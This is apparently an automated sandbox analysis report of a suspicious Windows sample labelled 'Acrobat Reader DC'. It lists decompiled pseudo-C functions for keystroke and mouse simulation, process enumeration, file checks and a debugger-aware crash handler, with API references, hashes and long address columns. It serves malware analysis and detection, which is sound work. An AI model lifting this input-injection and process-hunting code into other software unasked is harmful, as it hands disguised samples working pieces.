                                  0x00000000
                                  0x00000000
                                  0x00446f65
                                  0x00446f66
                                  0x00446f68
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00446f68
                                  0x00446f5b
                                  0x00446f55
                                  0x00000000
                                  0x00446f2a
                                  0x00446f2a
                                  0x00446f2a
                                  0x00446f30
                                  0x00446f33
                                  0x00000000
                                  0x00446f39
                                  0x00446f39
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00446f40
                                  0x00446f43
                                  0x00446f45
                                  0x00000000
                                  0x00000000
                                  0x00446f6a
                                  0x00446f6a
                                  0x00446f71
                                  0x00446f77
                                  0x00446f7e
                                  0x00446fda
                                  0x00446fda
                                  0x00446fe1
                                  0x00446fe3
                                  0x00000000
                                  0x00446fe5
                                  0x00446fe5
                                  0x00446fe8
                                  0x00000000
                                  0x00446fea
                                  0x00446fea
                                  0x00446fee
                                  0x00446ff0
                                  0x00446ff3
                                  0x00446ff5
                                  0x00446ff8
                                  0x00446ffa
                                  0x00446ffe
                                  0x00447000
                                  0x00447003
                                  0x00447016
                                  0x00447016
                                  0x00447005
                                  0x0044700a
                                  0x0044700c
                                  0x00000000
                                  0x0044700e
                                  0x0044700e
                                  0x00447014
                                  0x00000000
                                  0x00000000
                                  0x00447014
                                  0x0044700c
                                  0x00447003
                                  0x00446ffe
                                  0x00446ff8
                                  0x00446ff3
                                  0x00447019
                                  0x0044701f
                                  0x00000000
                                  0x0044701f
                                  0x00446fe8
                                  0x00446f80
                                  0x00446f80
                                  0x00446f82
                                  0x00446fb4
                                  0x00446fbc
                                  0x00446fbe
                                  0x00000000
                                  0x00446fc0
                                  0x00446fc2
                                  0x00446fc8
                                  0x00000000
                                  0x00446fca
                                  0x00446fca
                                  0x00446fcd
                                  0x00000000
                                  0x00446fcf
                                  0x00446fcf
                                  0x00446fd2
                                  0x00446fd8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00446fd8
                                  0x00446fcd
                                  0x00446fc8
                                  0x00446f84
                                  0x00446f84
                                  0x00446f87
                                  0x00446f89
                                  0x00000000
                                  0x00446f8b
                                  0x00446f99
                                  0x00446f9e
                                  0x00446fa1
                                  0x00446fa3
                                  0x00000000
                                  0x00446fa9
                                  0x00446fa9
                                  0x00000000
                                  0x00446fa9
                                  0x00446fa3
                                  0x00446f89
                                  0x00446f82
                                  0x00000000
                                  0x00000000
                                  0x00446f39
                                  0x00446f33
                                  0x00446f28
                                  0x00446e4e
                                  0x00446e4e
                                  0x00446e52
                                  0x00000000
                                  0x00446e58
                                  0x00446e58
                                  0x00446e5e
                                  0x00446e60
                                  0x00000000
                                  0x00446e62
                                  0x00446e66
                                  0x00446e6c
                                  0x00000000
                                  0x00446e6e
                                  0x00446e70
                                  0x00446e76
                                  0x00446e78
                                  0x00446e7e
                                  0x00000000
                                  0x00446e80
                                  0x00446e80
                                  0x00446e87
                                  0x00446ead
                                  0x00446eaf
                                  0x00000000
                                  0x00446eb1
                                  0x00446eb1
                                  0x00446eb1
                                  0x00446eb4
                                  0x00446eb5
                                  0x00446eb7
                                  0x00000000
                                  0x00000000
                                  0x00446eb9
                                  0x00446ebb
                                  0x00000000
                                  0x00446ebd
                                  0x00446ebd
                                  0x00000000
                                  0x00446ebd
                                  0x00000000
                                  0x00446ebb
                                  0x00000000
                                  0x00446eb1
                                  0x00446e89
                                  0x00446e89
                                  0x00446e8b
                                  0x00446ea1
                                  0x00446ea1
                                  0x0044703b
                                  0x0044703b
                                  0x0044703e
                                  0x00447041
                                  0x00447041
                                  0x00447045
                                  0x0044704e
                                  0x00447054
                                  0x00447057
                                  0x00447059
                                  0x00447069
                                  0x00447069
                                  0x0044706b
                                  0x00447091
                                  0x00447091
                                  0x0044709a
                                  0x0044706d
                                  0x0044706d
                                  0x00447071
                                  0x00447073
                                  0x00447079
                                  0x0044707e
                                  0x0044707e
                                  0x00447080
                                  0x00447082
                                  0x00447082
                                  0x00447090
                                  0x00447090
                                  0x0044705b
                                  0x0044705b
                                  0x0044705e
                                  0x00000000
                                  0x00447060
                                  0x00447068
                                  0x00447068
                                  0x0044705e
                                  0x00446e8d
                                  0x00446e8d
                                  0x00446e8d
                                  0x00446e90
                                  0x00446e91
                                  0x00446e93
                                  0x00000000
                                  0x00000000
                                  0x00446e95
                                  0x00446e9b
                                  0x00000000
                                  0x00446e9d
                                  0x00446e9d
                                  0x00446e9f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00446e9f
                                  0x00000000
                                  0x00446e9b
                                  0x00446ec9
                                  0x00446ec9
                                  0x00446eca
                                  0x00446ecc
                                  0x00000000
                                  0x00446ece
                                  0x00446ece
                                  0x00000000
                                  0x00446ece
                                  0x00446ecc
                                  0x00446e8b
                                  0x00446e87
                                  0x00446e7e
                                  0x00446e6c
                                  0x00446e60
                                  0x00446e52
                                  0x00000000
                                  0x00446e48
                                  0x00446a1d
                                  0x00446a28
                                  0x00446a28
                                  0x00446a1b
                                  0x004469fc
                                  0x00446969
                                  0x00446969
                                  0x00446970
                                  0x00000000
                                  0x00446972
                                  0x00446972
                                  0x00446977
                                  0x0044697c
                                  0x0044697f
                                  0x00446981
                                  0x004469a2
                                  0x004469a5
                                  0x004469a7
                                  0x00000000
                                  0x004469a9
                                  0x004469a9
                                  0x004469ab
                                  0x00000000
                                  0x004469ad
                                  0x004469b2
                                  0x004469b5
                                  0x00000000
                                  0x004469b7
                                  0x004469c2
                                  0x004469c2
                                  0x004469b5
                                  0x004469ab
                                  0x00446983
                                  0x00446983
                                  0x00446985
                                  0x00446996
                                  0x004469a1
                                  0x00446987
                                  0x00446987
                                  0x00446990
                                  0x0044713f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00446990
                                  0x00446985
                                  0x00446981
                                  0x00446970
                                  0x00446953
                                  0x00446953
                                  0x00446957
                                  0x00000000
                                  0x00446959
                                  0x00446964
                                  0x00446964
                                  0x00446957
                                  0x004468c8
                                  0x004468c8
                                  0x004468ce
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004468ce
                                  0x004468c6
                                  0x004468be
                                  0x004468ba
                                  0x00446869
                                  0x00446869
                                  0x0044686e
                                  0x0044689a
                                  0x0044689a
                                  0x00000000
                                  0x00446870
                                  0x00446870
                                  0x0044687b
                                  0x0044687b
                                  0x0044686e
                                  0x00446867
                                  0x0044672a
                                  0x00446740
                                  0x00446742
                                  0x00446745
                                  0x00446747
                                  0x00446753
                                  0x00000000
                                  0x00446749
                                  0x00446749
                                  0x00446752
                                  0x00446752
                                  0x00446747
                                  0x00446728
                                  0x004466d3
                                  0x004466bc
                                  0x004466c7
                                  0x004466c7
                                  0x0044668a
                                  0x00446695
                                  0x00446695
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                  • API String ID: 0-2872873767
                                  • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                  • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                  • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                  • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004443FC(intOrPtr _a4, char* _a8) {
				signed int _v99;
				signed int _v100;
				signed int _v169;
				signed int _v242;
				signed int _v243;
				signed int _v244;
				char _v260;
				void* _t53;
				struct HWND__* _t54;
				intOrPtr _t68;
				char* _t102;
				intOrPtr _t103;

				_t103 = _a4;
				_t102 = _a8;
				if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0 ||  *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t102 + 3)) != 0 ||  *((char*)(_t102 + 4)) != 0) {
					_t54 =  *(_t103 + 0x20);
					if(_t54 == 0 || GetParent(_t54) == 0) {
						if( *_t102 != 0) {
							E0043471D(_t103, 0xa0,  *(_t103 + 0x27) & 0x000000ff, 2);
						}
						if( *((char*)(_t102 + 1)) != 0) {
							E0043471D(_t103, 0xa1,  *(_t103 + 0x28) & 0x000000ff, 2);
						}
						if( *((char*)(_t102 + 2)) != 0) {
							E0043471D(_t103, 0x11,  *(_t103 + 0x24) & 0x000000ff, 2);
						}
						if( *((char*)(_t102 + 3)) != 0) {
							E0043471D(_t103, 0x12,  *(_t103 + 0x25) & 0x000000ff, 2);
						}
						if( *((char*)(_t102 + 4)) != 0) {
							E0043471D(_t103, 0x5b,  *(_t103 + 0x29) & 0x000000ff, 2);
						}
						L43:
						return E004347A9(_t103);
					}
					if(GetKeyboardState( &_v260) != 0) {
						if( *_t102 != 0) {
							_v244 = _v244 ^ 0x00000080;
							_v100 = _v100 ^ 0x00000080;
						}
						if( *((char*)(_t102 + 1)) != 0) {
							_v244 = _v244 ^ 0x00000080;
							_v99 = _v99 ^ 0x00000080;
						}
						if( *((char*)(_t102 + 2)) != 0) {
							_v243 = _v243 ^ 0x00000080;
						}
						if( *((char*)(_t102 + 3)) != 0) {
							_v242 = _v242 ^ 0x00000080;
						}
						if( *((char*)(_t102 + 4)) != 0) {
							_v169 = _v169 ^ 0x00000080;
						}
						SetKeyboardState( &_v260);
					}
					if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0) {
						PostMessageW( *(_t103 + 0x20), 0x101, 0x10, ( *(_t103 + 0x26) & 0x000000ff) << 0x00000010 | 0xc0000001);
					}
					if( *((char*)(_t102 + 2)) != 0) {
						PostMessageW( *(_t103 + 0x20), 0x101, 0x11, ( *(_t103 + 0x24) & 0x000000ff) << 0x00000010 | 0xc0000001);
					}
					_t68 =  *((intOrPtr*)(_t102 + 3));
					if(_t68 != 0) {
						if( *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t103 + 0x1c)) != 0) {
							if(_t68 != 0) {
								PostMessageW( *(_t103 + 0x20), 0x101, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0xc0000001);
								goto L30;
							}
						} else {
							PostMessageW( *(_t103 + 0x20), 0x105, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0xe0000001);
							L30:
						}
					}
					if( *((char*)(_t102 + 4)) == 0) {
						goto L43;
					}
					PostMessageW( *(_t103 + 0x20), 0x101, 0x5b, ( *(_t103 + 0x29) & 0x000000ff) << 0x00000010 | 0xc0000001);
					return E004347A9(_t103);
				} else {
					return _t53;
				}
			}















                                  0x00444406
                                  0x0044440a
                                  0x00444410
                                  0x0044442e
                                  0x00444434
                                  0x0044457a
                                  0x00444589
                                  0x00444589
                                  0x00444592
                                  0x004445a1
                                  0x004445a1
                                  0x004445aa
                                  0x004445b6
                                  0x004445b6
                                  0x004445bf
                                  0x004445cb
                                  0x004445cb
                                  0x004445d4
                                  0x004445e0
                                  0x004445e0
                                  0x004445e5
                                  0x00000000
                                  0x004445eb
                                  0x00444458
                                  0x0044445f
                                  0x00444461
                                  0x00444467
                                  0x00444467
                                  0x0044446e
                                  0x00444470
                                  0x00444476
                                  0x00444476
                                  0x0044447d
                                  0x0044447f
                                  0x0044447f
                                  0x00444489
                                  0x0044448b
                                  0x0044448b
                                  0x00444495
                                  0x00444497
                                  0x00444497
                                  0x004444a4
                                  0x004444a4
                                  0x004444b3
                                  0x004444d4
                                  0x004444d4
                                  0x004444da
                                  0x004444f5
                                  0x004444f5
                                  0x004444f7
                                  0x004444fc
                                  0x00444502
                                  0x00444526
                                  0x00444541
                                  0x00000000
                                  0x00444541
                                  0x0044450a
                                  0x00444541
                                  0x00444541
                                  0x00444541
                                  0x00444502
                                  0x00444547
                                  0x00000000
                                  0x00000000
                                  0x00444566
                                  0x00444574
                                  0x004445f1
                                  0x004445f1
                                  0x004445f1

                                  APIs
                                  • GetParent.USER32(?), ref: 0044443B
                                  • GetKeyboardState.USER32(?), ref: 00444450
                                  • SetKeyboardState.USER32(?), ref: 004444A4
                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                  • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                  • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                  • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433EE0 Relevance: 10.6, APIs: 7, Instructions: 78processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E00433EE0(void* __eflags, intOrPtr _a4, intOrPtr* _a8, char* _a12) {
				char _v12;
				char _v532;
				intOrPtr _v560;
				void* _v568;
				char _v1084;
				char _v1600;
				char _v2116;
				void* __edi;
				void* _t22;
				void* _t31;
				intOrPtr _t32;
				void* _t34;
				void* _t45;
				char* _t46;
				void* _t47;
				void* _t48;

				_t46 = _a12;
				_v568 = 0x22c;
				_t45 = CreateToolhelp32Snapshot(2, 0);
				_push( &_v568);
				Process32FirstW(_t45);
				 *_t46 = 0;
				_t22 = E00433D5F(_a4, _a4);
				_t48 = _t47 + 4;
				_t34 = _t22;
				if( *_t46 == 0) {
					while(Process32NextW(_t45,  &_v568) == 1) {
						E00413A0E( &_v532,  &_v12,  &_v2116,  &_v1084,  &_v1600);
						E00411536( &_v1084,  &_v1600);
						_t31 = E004114AB(_t45,  &_v1084, _a4);
						_t48 = _t48 + 0x24;
						if(_t31 != 0) {
							if(_t34 != 0) {
								_t32 = _v560;
								if(_t34 == _t32) {
									 *_a8 = _t32;
									goto L8;
								}
							}
						} else {
							 *_a8 = _v560;
							L8:
							 *_t46 = 1;
						}
						if( *_t46 == 0) {
							continue;
						}
						goto L10;
					}
				}
				L10:
				CloseHandle(_t45);
				return 1;
			}



















                                  0x00433eeb
                                  0x00433ef3
                                  0x00433f03
                                  0x00433f0b
                                  0x00433f0d
                                  0x00433f17
                                  0x00433f1a
                                  0x00433f1f
                                  0x00433f25
                                  0x00433f27
                                  0x00433f30
                                  0x00433f63
                                  0x00433f76
                                  0x00433f86
                                  0x00433f8b
                                  0x00433f90
                                  0x00433fa1
                                  0x00433fa3
                                  0x00433fab
                                  0x00433fb0
                                  0x00000000
                                  0x00433fb0
                                  0x00433fab
                                  0x00433f92
                                  0x00433f9b
                                  0x00433fb2
                                  0x00433fb2
                                  0x00433fb2
                                  0x00433fb8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00433fb8
                                  0x00433f30
                                  0x00433fbe
                                  0x00433fbf
                                  0x00433fcd

                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00433EFD
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00433F0D
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00433F38
                                  • __wsplitpath.LIBCMT ref: 00433F63
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcscat.LIBCMT ref: 00433F76
                                  • __wcsicoll.LIBCMT ref: 00433F86
                                  • CloseHandle.KERNEL32(00000000), ref: 00433FBF
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                  • String ID:
                                  • API String ID: 2547909840-0
                                  • Opcode ID: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                  • Instruction ID: e17d583989bb1df9e9dd6b28cd90faaf4a95b78209a4298828de810110d6b8cb
                                  • Opcode Fuzzy Hash: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
                                  • Instruction Fuzzy Hash: 9621EAB2800109ABC721DF50DC84FEEB7B8AB48300F5045DEF60997240EB799B84CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0041A208(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x490d40; // 0x774e8904
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x497278 = _t6;
				 *0x497274 = _t22;
				 *0x497270 = _t25;
				 *0x49726c = _t21;
				 *0x497268 = _t27;
				 *0x497264 = _t26;
				 *0x497290 = ss;
				 *0x497284 = cs;
				 *0x497260 = ds;
				 *0x49725c = es;
				 *0x497258 = fs;
				 *0x497254 = gs;
				asm("pushfd");
				_pop( *0x497288);
				 *0x49727c =  *_t31;
				 *0x497280 = _v0;
				 *0x49728c =  &_a4;
				 *0x4971c8 = 0x10001;
				 *0x49717c =  *0x497280;
				 *0x497170 = 0xc0000409;
				 *0x497174 = 1;
				_t12 =  *0x490d40; // 0x774e8904
				_v812 = _t12;
				_t13 =  *0x490d44; // 0x88b176fb
				_v808 = _t13;
				 *0x4971c0 = IsDebuggerPresent();
				_push(1);
				E0041FE19(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("pqI");
				if( *0x4971c0 == 0) {
					_push(1);
					E0041FE19(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}


















                                  0x0041a208
                                  0x0041a208
                                  0x0041a208
                                  0x0041a208
                                  0x0041a208
                                  0x0041a208
                                  0x0041a208
                                  0x0041a20e
                                  0x0041a210
                                  0x0041a210
                                  0x00421f11
                                  0x00421f16
                                  0x00421f1c
                                  0x00421f22
                                  0x00421f28
                                  0x00421f2e
                                  0x00421f34
                                  0x00421f3b
                                  0x00421f42
                                  0x00421f49
                                  0x00421f50
                                  0x00421f57
                                  0x00421f5e
                                  0x00421f5f
                                  0x00421f68
                                  0x00421f70
                                  0x00421f78
                                  0x00421f83
                                  0x00421f92
                                  0x00421f97
                                  0x00421fa1
                                  0x00421fab
                                  0x00421fb0
                                  0x00421fb6
                                  0x00421fbb
                                  0x00421fc7
                                  0x00421fcc
                                  0x00421fce
                                  0x00421fd6
                                  0x00421fe1
                                  0x00421fee
                                  0x00421ff0
                                  0x00421ff2
                                  0x00421ff7
                                  0x0042200b

                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                  • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                  • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID: pqI
                                  • API String ID: 2579439406-2459173057
                                  • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                  • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                  • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                  • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0043333C(intOrPtr _a4) {
				long _t2;
				long _t3;
				void* _t7;

				_t8 = _a4;
				_t2 = E004114AB(_t7, _a4, L"UP");
				if(_t2 != 0) {
					_t3 = E004114AB(_t7, _t8, L"DOWN");
					if(_t3 != 0) {
						return 0;
					} else {
						mouse_event(0x800, _t3, _t3, 0xffffff88, _t3);
						return 1;
					}
				} else {
					mouse_event(0x800, _t2, _t2, 0x78, _t2);
					return 1;
				}
			}






                                  0x00433340
                                  0x00433349
                                  0x00433353
                                  0x00433375
                                  0x0043337f
                                  0x0043336e
                                  0x00433381
                                  0x0043338b
                                  0x00433395
                                  0x00433395
                                  0x00433355
                                  0x0043335f
                                  0x00433369
                                  0x00433369

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicollmouse_event
                                  • String ID: DOWN
                                  • API String ID: 1033544147-711622031
                                  • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                  • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                  • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                  • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004339B6(WCHAR* _a4) {
				struct _WIN32_FIND_DATAW _v596;
				long _t4;
				void* _t6;
				WCHAR* _t10;

				_t10 = _a4;
				_t4 = GetFileAttributesW(_t10);
				if(_t4 != 0xffffffff) {
					L4:
					return _t4;
				} else {
					_t6 = FindFirstFileW(_t10,  &_v596);
					if(_t6 != 0xffffffff) {
						FindClose(_t6);
						_t4 = _v596.dwFileAttributes;
						goto L4;
					} else {
						return _t6;
					}
				}
			}







                                  0x004339c3
                                  0x004339c7
                                  0x004339d0
                                  0x004339f5
                                  0x004339f9
                                  0x004339d2
                                  0x004339d8
                                  0x004339e1
                                  0x004339eb
                                  0x004339f1
                                  0x00000000
                                  0x004339e3
                                  0x004339e9
                                  0x004339e9
                                  0x004339e1

                                  APIs
                                  • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                  • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                  • FindClose.KERNEL32(00000000), ref: 004339EB
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FileFind$AttributesCloseFirst
                                  • String ID:
                                  • API String ID: 48322524-0
                                  • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                  • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
